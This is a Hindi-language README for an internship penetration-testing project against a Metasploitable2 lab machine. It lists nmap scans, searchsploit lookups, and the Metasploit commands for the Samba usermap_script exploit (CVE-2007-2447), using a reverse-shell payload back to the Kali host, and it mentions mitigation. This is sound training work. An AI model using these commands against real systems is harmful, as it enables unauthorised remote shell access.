
Kali Linux बनाम Metasploitable2 का उपयोग करने वाला व्यावहारिक पेंटेस्ट प्रोजेक्ट। पूर्ण कार्यप्रवाह शामिल है: Nmap स्कैनिंग, गणना, Metasploit शोषण (Samba CVE-2007-2447), पोस्ट-एक्सप्लॉइटेशन सत्यापन और शमन चरण। रिपॉजिटरी में आक्रामक तकनीकों और रक्षात्मक अनुशंसाओं दोनों को दिखाने वाले कमांड, आउटपुट और रिपोर्ट शामिल हैं।
इंटर्नशिप प्रोजेक्ट 2 — मेटास्प्लॉइटेबल2 पर पेनिट्रेशन टेस्टिंग
सारांश: यह प्रोजेक्ट एक पूर्ण पेनिट्रेशन टेस्टिंग वर्कफ़्लो प्रदर्शित करता है: रिकॉनिसेंस, एन्यूमरेशन, एक्सप्लॉइटेशन, पोस्ट-एक्सप्लॉइटेशन वैलिडेशन, और शमन अनुशंसाएँ। उपयोग किया गया लक्ष्य Metasploitable2 है और आक्रमण बॉक्स Kali Linux है।
उपकरण: Kali Linux (हमलावर) Nmap (रिकॉन) Metasploit Framework (एक्सप्लॉइटेशन) SearchSploit / Exploit-DB (ट्राइएज)
किए गए चरण:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
पहचानी गई सेवाएँ (उदाहरण): vsftpd 2.3.4 (पोर्ट 21 बैनर), Samba smbd 3.x (पोर्ट 445)।searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
संभावित एक्सप्लॉइट से सेवाओं का मिलान किया (vsftpd बैकडोर, Samba username-map)।msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
इंटरैक्टिव शेल प्राप्त किया और उपयोगकर्ता संदर्भ को मान्य किया।id uname -aपरिणाम Samba एक्सप्लॉइट के माध्यम से सफलतापूर्वक एक रिमोट शेल प्राप्त किया, हमले का मार्ग दस्तावेजित किया, और एक शमन योजना तैयार की। पूर्ण लॉग और कमांड आउटपुट scans/ फ़ोल्डर में संग्रहीत हैं।